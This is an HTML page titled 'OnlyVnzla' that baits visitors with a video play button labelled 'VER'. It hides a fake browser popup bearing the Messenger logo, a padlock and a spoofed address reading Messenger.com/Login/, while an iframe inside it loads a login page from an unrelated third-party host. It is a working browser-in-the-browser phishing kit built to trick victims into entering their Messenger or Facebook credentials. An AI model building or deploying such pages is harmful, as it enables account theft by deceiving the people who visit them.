<!DOCTYPE html>
<html>
<header>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
	<link rel="stylesheet" href="style.css">
	<title>OnlyVnzla</title>
</header>

<body>

	<div class="video">
		<div class="play-btn">
			<ion-icon name="play"></ion-icon>
			<button id="clickme" class="btn">VER</button>
		</div>
	</div>
<style type="text/css">
		*
		{
			margin: 0;
			padding: 0;
		}
		body
		{
			width: 100%;
			height: 100vh;
			background: #000000;
			display: flex;
			align-items: center;
			justify-content: center;
		}
		.video
		{
			width: 425px;
			height: 695px;
			background: linear-gradient(rgba(0,0,0,.5),rgba(0,0,0,.5)),url(https://i.ibb.co/Sc8CQHt/lajary.jpg);
			border-radius: 5%;
			background-size: cover;
			background-repeat: no-repeat;
			display: flex;
			align-items: center;
			justify-content: center;
			z-index: 1;
		}
		.play-btn
		{
			display: flex;
			align-items: center;
			justify-content: center;
			background: rgba(2, 128, 231, 0.726);
			color: #ffffff;
			font-size: 50px;
			width: 100px;
			height: 100px;
			border-radius: 100%;
			position: relative;
			z-index: 1;
		}
		.play-btn::before
		{
			content: '';
			position: absolute;
			border: 15px solid #fff;
			border-radius: 50%;
			top: -20px;
			left: -20px;
			right: -20px;
			bottom: -20px;
			animation: bloom1 1.5s linear infinite;
			opacity: 0;
			z-index: 1;
		}
		.play-btn:after
		{
			content: '';
			position: absolute;
			border: 15px solid #fff;
			border-radius: 50%;
			top: -20px;
			left: -20px;
			right: -20px;
			bottom: -20px;
			animation: bloom2 1.5s linear infinite;
			opacity: 0;
			z-index: 1;
			animation-delay: .4s;
		}
		@keyframes bloom1
		{
			0%
			{
				transform: scale(.5);
			}
			50%
			{
				opacity: 1;
			}
			100%
			{
				transform: scale(1.5);
			}
		}
		@keyframes bloom2
		{
			0%
			{
				transform: scale(.5);
			}
			50%
			{
				opacity: 1;
			}
			100%
			{
				transform: scale(1.5);
			}
		}
		.btn
		{
  			position: absolute;
  			top: 50%;
  			left: 48%;
  			transform: translate(-50%, -50%);
  			-ms-transform: translate(-50%, -50%);
  			background-color: #f1f1f1;
  			color: rgb(255, 255, 255);
  			font-size: 16
  			padding: 16px 30px;
  			border: none;
  			cursor: pointer;
  			border-radius: 20px;
  			text-align: center;
			z-index: 3;
		}
</style>
<div id="window" style="margin: auto; position: relative; bottom: auto; display: none; z-index: 4;">
<!-- Title bar start -->
<div id="title-bar-width">
	<div id="title-bar">
		<div style="margin-top:5px;">
			<img src="https://cdn.iconscout.com/icon/free/png-256/free-facebook-messenger-2923653-2416656.png" width="16px" height="15px" id="logo">
			<span id="logo-description">Messenger</span>
		</div>

		<div>
			<span id="minimize">&#8212;</span>
			<span id="square">□</span>
			<span id="exit">✕</span>
		</div>
	</div>
	<div id="url-bar">
		<img src="./ssl.svg" width="20px" height="20px" id="ssl-padlock">
		<span id="domain-path">https://</span>
		<span id="domain-name">Messenger.com</span>
		<span id="domain-path">/Login/</span>
	</div>
</div>
<!-- Content start -->
<iframe id="content" src="http://therepository-001-site1.gtempurl.com/" frameBorder="0"></iframe>
</div>
<script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
<script nomodule src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.js"></script>

</body>
<script src="script.js"></script>
</html>

